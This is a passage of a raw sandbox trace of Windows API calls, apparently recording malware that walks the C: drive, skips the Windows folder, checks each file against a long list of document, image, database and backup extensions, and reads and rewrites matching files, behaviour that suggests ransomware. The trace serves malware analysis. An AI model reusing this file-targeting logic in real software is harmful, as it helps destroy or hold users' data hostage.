dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0219.818] GetLastError () returned 0x0 [0219.818] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0222.615] WriteFile (hFile=0x450, lpBuffer=0x4229020, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0) Thread: id = 20 os_tid = 0xcc4 [0195.719] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x3f41220 [0195.719] lstrlenW (lpString="C:") returned 2 [0195.719] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x369fcf8 | out: lpFindFileData=0x369fcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x6042b8 [0195.720] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0195.720] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0195.720] lstrlenW (lpString="$GetCurrent") returned 11 [0195.720] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0195.720] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x3f51228 [0195.721] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0195.721] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x6042f8 [0195.727] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0195.728] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0195.728] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0195.728] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0195.728] lstrlenW (lpString="Logs") returned 4 [0195.728] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0195.729] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x3f91248 [0195.729] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0195.729] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0195.742] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.743] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0195.743] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0195.743] lstrlenW (lpString=".1cd") returned 4 [0195.743] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0195.743] lstrlenW (lpString=".3ds") returned 4 [0195.743] lstrcmpiW (lpString1=".3ds", lpString2=".log") returned -1 [0195.743] lstrlenW (lpString=".3fr") returned 4 [0195.743] lstrcmpiW (lpString1=".3fr", lpString2=".log") returned -1 [0195.743] lstrlenW (lpString=".3g2") returned 4 [0195.743] lstrcmpiW (lpString1=".3g2", lpString2=".log") returned -1 [0195.743] lstrlenW (lpString=".3gp") returned 4 [0195.743] lstrcmpiW (lpString1=".3gp", lpString2=".log") returned -1 [0195.743] lstrlenW (lpString=".7z") returned 3 [0195.743] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0195.743] lstrlenW (lpString=".accda") returned 6 [0195.743] lstrcmpiW (lpString1=".accda", lpString2="66.log") returned -1 [0195.743] lstrlenW (lpString=".accdb") returned 6 [0195.743] lstrcmpiW (lpString1=".accdb", lpString2="66.log") returned -1 [0195.743] lstrlenW (lpString=".accdc") returned 6 [0195.743] lstrcmpiW (lpString1=".accdc", lpString2="66.log") returned -1 [0195.743] lstrlenW (lpString=".accde") returned 6 [0195.743] lstrcmpiW (lpString1=".accde", lpString2="66.log") returned -1 [0195.743] lstrlenW (lpString=".accdt") returned 6 [0195.743] lstrcmpiW (lpString1=".accdt", lpString2="66.log") returned -1 [0195.743] lstrlenW (lpString=".accdw") returned 6 [0195.743] lstrcmpiW (lpString1=".accdw", lpString2="66.log") returned -1 [0195.743] lstrlenW (lpString=".adb") returned 4 [0195.744] lstrcmpiW (lpString1=".adb", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".adp") returned 4 [0195.744] lstrcmpiW (lpString1=".adp", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".ai") returned 3 [0195.744] lstrcmpiW (lpString1=".ai", lpString2="log") returned -1 [0195.744] lstrlenW (lpString=".ai3") returned 4 [0195.744] lstrcmpiW (lpString1=".ai3", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".ai4") returned 4 [0195.744] lstrcmpiW (lpString1=".ai4", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".ai5") returned 4 [0195.744] lstrcmpiW (lpString1=".ai5", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".ai6") returned 4 [0195.744] lstrcmpiW (lpString1=".ai6", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".ai7") returned 4 [0195.744] lstrcmpiW (lpString1=".ai7", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".ai8") returned 4 [0195.744] lstrcmpiW (lpString1=".ai8", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".anim") returned 5 [0195.744] lstrcmpiW (lpString1=".anim", lpString2="6.log") returned -1 [0195.744] lstrlenW (lpString=".arw") returned 4 [0195.744] lstrcmpiW (lpString1=".arw", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".as") returned 3 [0195.744] lstrcmpiW (lpString1=".as", lpString2="log") returned -1 [0195.744] lstrlenW (lpString=".asa") returned 4 [0195.744] lstrcmpiW (lpString1=".asa", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".asc") returned 4 [0195.744] lstrcmpiW (lpString1=".asc", lpString2=".log") returned -1 [0195.744] lstrlenW (lpString=".ascx") returned 5 [0195.744] lstrcmpiW (lpString1=".ascx", lpString2="6.log") returned -1 [0195.744] lstrlenW (lpString=".asm") returned 4 [0195.745] lstrcmpiW (lpString1=".asm", lpString2=".log") returned -1 [0195.745] lstrlenW (lpString=".asmx") returned 5 [0195.745] lstrcmpiW (lpString1=".asmx", lpString2="6.log") returned -1 [0195.745] lstrlenW (lpString=".asp") returned 4 [0195.745] lstrcmpiW (lpString1=".asp", lpString2=".log") returned -1 [0195.745] lstrlenW (lpString=".aspx") returned 5 [0195.745] lstrcmpiW (lpString1=".aspx", lpString2="6.log") returned -1 [0195.745] lstrlenW (lpString=".asr") returned 4 [0195.745] lstrcmpiW (lpString1=".asr", lpString2=".log") returned -1 [0195.745] lstrlenW (lpString=".asx") returned 4 [0195.745] lstrcmpiW (lpString1=".asx", lpString2=".log") returned -1 [0195.745] lstrlenW (lpString=".avi") returned 4 [0195.745] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0195.745] lstrlenW (lpString=".avs") returned 4 [0195.745] lstrcmpiW (lpString1=".avs", lpString2=".log") returned -1 [0195.745] lstrlenW (lpString=".backup") returned 7 [0195.745] lstrcmpiW (lpString1=".backup", lpString2="766.log") returned -1 [0195.745] lstrlenW (lpString=".bak") returned 4 [0195.745] lstrcmpiW (lpString1=".bak", lpString2=".log") returned -1 [0195.745] lstrlenW (lpString=".bay") returned 4 [0195.745] lstrcmpiW (lpString1=".bay", lpString2=".log") returned -1 [0195.745] lstrlenW (lpString=".bd") returned 3 [0195.745] lstrcmpiW (lpString1=".bd", lpString2="log") returned -1 [0195.745] lstrlenW (lpString=".bin") returned 4 [0195.745] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0195.745] lstrlenW (lpString=".bmp") returned 4 [0195.745] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0195.745] lstrlenW (lpString=".bz2") returned 4 [0195.745] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0195.746] lstrlenW (lpString=".c") returned 2 [0195.746] lstrcmpiW (lpString1=".c", lpString2="og") returned -1 [0195.746] lstrlenW (lpString=".cdr") returned 4 [0195.746] lstrcmpiW (lpString1=".cdr", lpString2=".log") returned -1 [0195.746] lstrlenW (lpString=".cer") returned 4 [0195.746] lstrcmpiW (lpString1=".cer", lpString2=".log") returned -1 [0195.746] lstrlenW (lpString=".cf") returned 3 [0195.746] lstrcmpiW (lpString1=".cf", lpString2="log") returned -1 [0195.746] lstrlenW (lpString=".cfc") returned 4 [0195.746] lstrcmpiW (lpString1=".cfc", lpString2=".log") returned -1 [0195.746] lstrlenW (lpString=".cfm") returned 4 [0195.746] lstrcmpiW (lpString1=".cfm", lpString2=".log") returned -1 [0195.746] lstrlenW (lpString=".cfml") returned 5 [0195.746] lstrcmpiW (lpString1=".cfml", lpString2="6.log") returned -1 [0195.746] lstrlenW (lpString=".cfu") returned 4 [0195.746] lstrcmpiW (lpString1=".cfu", lpString2=".log") returned -1 [0195.746] lstrlenW (lpString=".chm") returned 4 [0195.746] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0195.746] lstrlenW (lpString=".cin") returned 4 [0195.746] lstrcmpiW (lpString1=".cin", lpString2=".log") returned -1 [0195.746] lstrlenW (lpString=".class") returned 6 [0195.746] lstrcmpiW (lpString1=".class", lpString2="66.log") returned -1 [0195.746] lstrlenW (lpString=".clx") returned 4 [0195.746] lstrcmpiW (lpString1=".clx", lpString2=".log") returned -1 [0195.746] lstrlenW (lpString=".config") returned 7 [0195.746] lstrcmpiW (lpString1=".config", lpString2="766.log") returned -1 [0195.746] lstrlenW (lpString=".cpp") returned 4 [0195.746] lstrcmpiW (lpString1=".cpp", lpString2=".log") returned -1 [0195.746] lstrlenW (lpString=".cr2") returned 4 [0195.747] lstrcmpiW (lpString1=".cr2", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".crt") returned 4 [0195.747] lstrcmpiW (lpString1=".crt", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".crw") returned 4 [0195.747] lstrcmpiW (lpString1=".crw", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".cs") returned 3 [0195.747] lstrcmpiW (lpString1=".cs", lpString2="log") returned -1 [0195.747] lstrlenW (lpString=".css") returned 4 [0195.747] lstrcmpiW (lpString1=".css", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".csv") returned 4 [0195.747] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".cub") returned 4 [0195.747] lstrcmpiW (lpString1=".cub", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".dae") returned 4 [0195.747] lstrcmpiW (lpString1=".dae", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".dat") returned 4 [0195.747] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".db") returned 3 [0195.747] lstrcmpiW (lpString1=".db", lpString2="log") returned -1 [0195.747] lstrlenW (lpString=".dbf") returned 4 [0195.747] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".dbx") returned 4 [0195.747] lstrcmpiW (lpString1=".dbx", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".dc3") returned 4 [0195.747] lstrcmpiW (lpString1=".dc3", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".dcm") returned 4 [0195.747] lstrcmpiW (lpString1=".dcm", lpString2=".log") returned -1 [0195.747] lstrlenW (lpString=".dcr") returned 4 [0195.747] lstrcmpiW (lpString1=".dcr", lpString2=".log") returned -1 [0195.748] lstrlenW (lpString=".der") returned 4 [0195.748] lstrcmpiW (lpString1=".der", lpString2=".log") returned -1 [0195.748] lstrlenW (lpString=".dib") returned 4 [0195.748] lstrcmpiW (lpString1=".dib", lpString2=".log") returned -1 [0195.748] lstrlenW (lpString=".dic") returned 4 [0195.748] lstrcmpiW (lpString1=".dic", lpString2=".log") returned -1 [0195.748] lstrlenW (lpString=".dif") returned 4 [0195.748] lstrcmpiW (lpString1=".dif", lpString2=".log") returned -1 [0195.748] lstrlenW (lpString=".divx") returned 5 [0195.748] lstrcmpiW (lpString1=".divx", lpString2="6.log") returned -1 [0195.748] lstrlenW (lpString=".djvu") returned 5 [0195.748] lstrcmpiW (lpString1=".djvu", lpString2="6.log") returned -1 [0195.748] lstrlenW (lpString=".dng") returned 4 [0195.748] lstrcmpiW (lpString1=".dng", lpString2=".log") returned -1 [0195.748] lstrlenW (lpString=".doc") returned 4 [0195.748] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0195.748] lstrlenW (lpString=".docm") returned 5 [0195.748] lstrcmpiW (lpString1=".docm", lpString2="6.log") returned -1 [0195.748] lstrlenW (lpString=".docx") returned 5 [0195.748] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0195.748] lstrlenW (lpString=".dot") returned 4 [0195.748] lstrcmpiW (lpString1=".dot", lpString2=".log") returned -1 [0195.748] lstrlenW (lpString=".dotm") returned 5 [0195.748] lstrcmpiW (lpString1=".dotm", lpString2="6.log") returned -1 [0195.748] lstrlenW (lpString=".dotx") returned 5 [0195.748] lstrcmpiW (lpString1=".dotx", lpString2="6.log") returned -1 [0195.748] lstrlenW (lpString=".dpx") returned 4 [0195.748] lstrcmpiW (lpString1=".dpx", lpString2=".log") returned -1 [0195.748] lstrlenW (lpString=".dqy") returned 4 [0195.749] lstrcmpiW (lpString1=".dqy", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".dsn") returned 4 [0195.749] lstrcmpiW (lpString1=".dsn", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".dt") returned 3 [0195.749] lstrcmpiW (lpString1=".dt", lpString2="log") returned -1 [0195.749] lstrlenW (lpString=".dtd") returned 4 [0195.749] lstrcmpiW (lpString1=".dtd", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".dwg") returned 4 [0195.749] lstrcmpiW (lpString1=".dwg", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".dwt") returned 4 [0195.749] lstrcmpiW (lpString1=".dwt", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".dx") returned 3 [0195.749] lstrcmpiW (lpString1=".dx", lpString2="log") returned -1 [0195.749] lstrlenW (lpString=".dxf") returned 4 [0195.749] lstrcmpiW (lpString1=".dxf", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".edml") returned 5 [0195.749] lstrcmpiW (lpString1=".edml", lpString2="6.log") returned -1 [0195.749] lstrlenW (lpString=".efd") returned 4 [0195.749] lstrcmpiW (lpString1=".efd", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".elf") returned 4 [0195.749] lstrcmpiW (lpString1=".elf", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".emf") returned 4 [0195.749] lstrcmpiW (lpString1=".emf", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".emz") returned 4 [0195.749] lstrcmpiW (lpString1=".emz", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".epf") returned 4 [0195.749] lstrcmpiW (lpString1=".epf", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".eps") returned 4 [0195.749] lstrcmpiW (lpString1=".eps", lpString2=".log") returned -1 [0195.749] lstrlenW (lpString=".epsf") returned 5 [0195.750] lstrcmpiW (lpString1=".epsf", lpString2="6.log") returned -1 [0195.750] lstrlenW (lpString=".epsp") returned 5 [0195.750] lstrcmpiW (lpString1=".epsp", lpString2="6.log") returned -1 [0195.750] lstrlenW (lpString=".erf") returned 4 [0195.750] lstrcmpiW (lpString1=".erf", lpString2=".log") returned -1 [0195.750] lstrlenW (lpString=".exr") returned 4 [0195.750] lstrcmpiW (lpString1=".exr", lpString2=".log") returned -1 [0195.750] lstrlenW (lpString=".f4v") returned 4 [0195.750] lstrcmpiW (lpString1=".f4v", lpString2=".log") returned -1 [0195.750] lstrlenW (lpString=".fido") returned 5 [0195.750] lstrcmpiW (lpString1=".fido", lpString2="6.log") returned -1 [0195.750] lstrlenW (lpString=".flm") returned 4 [0195.750] lstrcmpiW (lpString1=".flm", lpString2=".log") returned -1 [0195.750] lstrlenW (lpString=".flv") returned 4 [0195.750] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0195.750] lstrlenW (lpString=".frm") returned 4 [0195.750] lstrcmpiW (lpString1=".frm", lpString2=".log") returned -1 [0195.750] lstrlenW (lpString=".fxg") returned 4 [0195.750] lstrcmpiW (lpString1=".fxg", lpString2=".log") returned -1 [0195.750] lstrlenW (lpString=".geo") returned 4 [0195.750] lstrcmpiW (lpString1=".geo", lpString2=".log") returned -1 [0195.750] lstrlenW (lpString=".gif") returned 4 [0195.750] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0195.750] lstrlenW (lpString=".grs") returned 4 [0195.750] lstrcmpiW (lpString1=".grs", lpString2=".log") returned -1 [0195.750] lstrlenW (lpString=".gz") returned 3 [0195.750] lstrcmpiW (lpString1=".gz", lpString2="log") returned -1 [0195.750] lstrlenW (lpString=".h") returned 2 [0195.750] lstrcmpiW (lpString1=".h", lpString2="og") returned -1 [0195.751] lstrlenW (lpString=".hdr") returned 4 [0195.751] lstrcmpiW (lpString1=".hdr", lpString2=".log") returned -1 [0195.751] lstrlenW (lpString=".hpp") returned 4 [0195.751] lstrcmpiW (lpString1=".hpp", lpString2=".log") returned -1 [0195.751] lstrlenW (lpString=".hta") returned 4 [0195.751] lstrcmpiW (lpString1=".hta", lpString2=".log") returned -1 [0195.751] lstrlenW (lpString=".htc") returned 4 [0195.751] lstrcmpiW (lpString1=".htc", lpString2=".log") returned -1 [0195.751] lstrlenW (lpString=".htm") returned 4 [0195.751] lstrcmpiW (lpString1=".htm", lpString2=".log") returned -1 [0195.751] lstrlenW (lpString=".html") returned 5 [0195.751] lstrcmpiW (lpString1=".html", lpString2="6.log") returned -1 [0195.751] lstrlenW (lpString=".icb") returned 4 [0195.751] lstrcmpiW (lpString1=".icb", lpString2=".log") returned -1 [0195.751] lstrlenW (lpString=".ics") returned 4 [0195.751] lstrcmpiW (lpString1=".ics", lpString2=".log") returned -1 [0195.751] lstrlenW (lpString=".iff") returned 4 [0195.751] lstrcmpiW (lpString1=".iff", lpString2=".log") returned -1 [0195.751] lstrlenW (lpString=".inc") returned 4 [0195.751] lstrcmpiW (lpString1=".inc", lpString2=".log") returned -1 [0195.751] lstrlenW (lpString=".indd") returned 5 [0195.751] lstrcmpiW (lpString1=".indd", lpString2="6.log") returned -1 [0195.752] lstrlenW (lpString=".ini") returned 4 [0195.752] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".iqy") returned 4 [0195.752] lstrcmpiW (lpString1=".iqy", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".j2c") returned 4 [0195.752] lstrcmpiW (lpString1=".j2c", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".j2k") returned 4 [0195.752] lstrcmpiW (lpString1=".j2k", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".java") returned 5 [0195.752] lstrcmpiW (lpString1=".java", lpString2="6.log") returned -1 [0195.752] lstrlenW (lpString=".jp2") returned 4 [0195.752] lstrcmpiW (lpString1=".jp2", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".jpc") returned 4 [0195.752] lstrcmpiW (lpString1=".jpc", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".jpe") returned 4 [0195.752] lstrcmpiW (lpString1=".jpe", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".jpeg") returned 5 [0195.752] lstrcmpiW (lpString1=".jpeg", lpString2="6.log") returned -1 [0195.752] lstrlenW (lpString=".jpf") returned 4 [0195.752] lstrcmpiW (lpString1=".jpf", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".jpg") returned 4 [0195.752] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".jpx") returned 4 [0195.752] lstrcmpiW (lpString1=".jpx", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".js") returned 3 [0195.752] lstrcmpiW (lpString1=".js", lpString2="log") returned -1 [0195.752] lstrlenW (lpString=".jsf") returned 4 [0195.752] lstrcmpiW (lpString1=".jsf", lpString2=".log") returned -1 [0195.752] lstrlenW (lpString=".json") returned 5 [0195.753] lstrcmpiW (lpString1=".json", lpString2="6.log") returned -1 [0195.753] lstrlenW (lpString=".jsp") returned 4 [0195.753] lstrcmpiW (lpString1=".jsp", lpString2=".log") returned -1 [0195.753] lstrlenW (lpString=".kdc") returned 4 [0195.753] lstrcmpiW (lpString1=".kdc", lpString2=".log") returned -1 [0195.753] lstrlenW (lpString=".kmz") returned 4 [0195.753] lstrcmpiW (lpString1=".kmz", lpString2=".log") returned -1 [0195.753] lstrlenW (lpString=".kwm") returned 4 [0195.753] lstrcmpiW (lpString1=".kwm", lpString2=".log") returned -1 [0195.753] lstrlenW (lpString=".lasso") returned 6 [0195.753] lstrcmpiW (lpString1=".lasso", lpString2="66.log") returned -1 [0195.753] lstrlenW (lpString=".lbi") returned 4 [0195.753] lstrcmpiW (lpString1=".lbi", lpString2=".log") returned -1 [0195.753] lstrlenW (lpString=".lgf") returned 4 [0195.753] lstrcmpiW (lpString1=".lgf", lpString2=".log") returned -1 [0195.753] lstrlenW (lpString=".lgp") returned 4 [0195.753] lstrcmpiW (lpString1=".lgp", lpString2=".log") returned -1 [0195.753] lstrlenW (lpString=".log") returned 4 [0195.753] lstrcmpiW (lpString1=".log", lpString2=".log") returned 0 [0195.753] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0195.753] lstrlenW (lpString="oobe_2017_09_07_03_08_57_737.log") returned 32 [0195.753] lstrlenW (lpString=".1cd") returned 4 [0195.753] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0195.753] lstrlenW (lpString=".3ds") returned 4 [0195.753] lstrcmpiW (lpString1=".3ds", lpString2=".log") returned -1 [0195.753] lstrlenW (lpString=".3fr") returned 4 [0195.753] lstrcmpiW (lpString1=".3fr", lpString2=".log") returned -1 [0195.754] lstrlenW (lpString=".3g2") returned 4 [0195.754] lstrcmpiW (lpString1=".3g2", lpString2=".log") returned -1 [0195.754] lstrlenW (lpString=".3gp") returned 4 [0195.754] lstrcmpiW (lpString1=".3gp", lpString2=".log") returned -1 [0195.754] lstrlenW (lpString=".7z") returned 3 [0195.754] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0195.754] lstrlenW (lpString=".accda") returned 6 [0195.754] lstrcmpiW (lpString1=".accda", lpString2="37.log") returned -1 [0195.754] lstrlenW (lpString=".accdb") returned 6 [0195.754] lstrcmpiW (lpString1=".accdb", lpString2="37.log") returned -1 [0195.754] lstrlenW (lpString=".accdc") returned 6 [0195.754] lstrcmpiW (lpString1=".accdc", lpString2="37.log") returned -1 [0195.754] lstrlenW (lpString=".accde") returned 6 [0195.754] lstrcmpiW (lpString1=".accde", lpString2="37.log") returned -1 [0195.754] lstrlenW (lpString=".accdt") returned 6 [0195.754] lstrcmpiW (lpString1=".accdt", lpString2="37.log") returned -1 [0195.754] lstrlenW (lpString=".accdw") returned 6 [0195.754] lstrcmpiW (lpString1=".accdw", lpString2="37.log") returned -1 [0195.754] lstrlenW (lpString=".adb") returned 4 [0195.754] lstrcmpiW (lpString1=".adb", lpString2=".log") returned -1 [0195.754] lstrlenW (lpString=".adp") returned 4 [0195.754] lstrcmpiW (lpString1=".adp", lpString2=".log") returned -1 [0195.754] lstrlenW (lpString=".ai") returned 3 [0195.754] lstrcmpiW (lpString1=".ai", lpString2="log") returned -1 [0195.754] lstrlenW (lpString=".ai3") returned 4 [0195.754] lstrcmpiW (lpString1=".ai3", lpString2=".log") returned -1 [0195.754] lstrlenW (lpString=".ai4") returned 4 [0195.754] lstrcmpiW (lpString1=".ai4", lpString2=".log") returned -1 [0195.754] lstrlenW (lpString=".ai5") returned 4 [0195.754] lstrcmpiW (lpString1=".ai5", lpString2=".log") returned -1 [0195.755] lstrlenW (lpString=".ai6") returned 4 [0195.755] lstrcmpiW (lpString1=".ai6", lpString2=".log") returned -1 [0195.755] lstrlenW (lpString=".ai7") returned 4 [0195.755] lstrcmpiW (lpString1=".ai7", lpString2=".log") returned -1 [0195.755] lstrlenW (lpString=".ai8") returned 4 [0195.755] lstrcmpiW (lpString1=".ai8", lpString2=".log") returned -1 [0195.755] lstrlenW (lpString=".anim") returned 5 [0195.755] lstrcmpiW (lpString1=".anim", lpString2="7.log") returned -1 [0195.755] lstrlenW (lpString=".arw") returned 4 [0195.755] lstrcmpiW (lpString1=".arw", lpString2=".log") returned -1 [0195.755] lstrlenW (lpString=".as") returned 3 [0195.755] lstrcmpiW (lpString1=".as", lpString2="log") returned -1 [0195.755] lstrlenW (lpString=".asa") returned 4 [0195.755] lstrcmpiW (lpString1=".asa", lpString2=".log") returned -1 [0195.755] lstrlenW (lpString=".asc") returned 4 [0195.755] lstrcmpiW (lpString1=".asc", lpString2=".log") returned -1 [0195.755] lstrlenW (lpString=".ascx") returned 5 [0195.755] lstrcmpiW (lpString1=".ascx", lpString2="7.log") returned -1 [0195.755] lstrlenW (lpString=".asm") returned 4 [0195.755] lstrcmpiW (lpString1=".asm", lpString2=".log") returned -1 [0195.755] lstrlenW (lpString=".asmx") returned 5 [0195.755] lstrcmpiW (lpString1=".asmx", 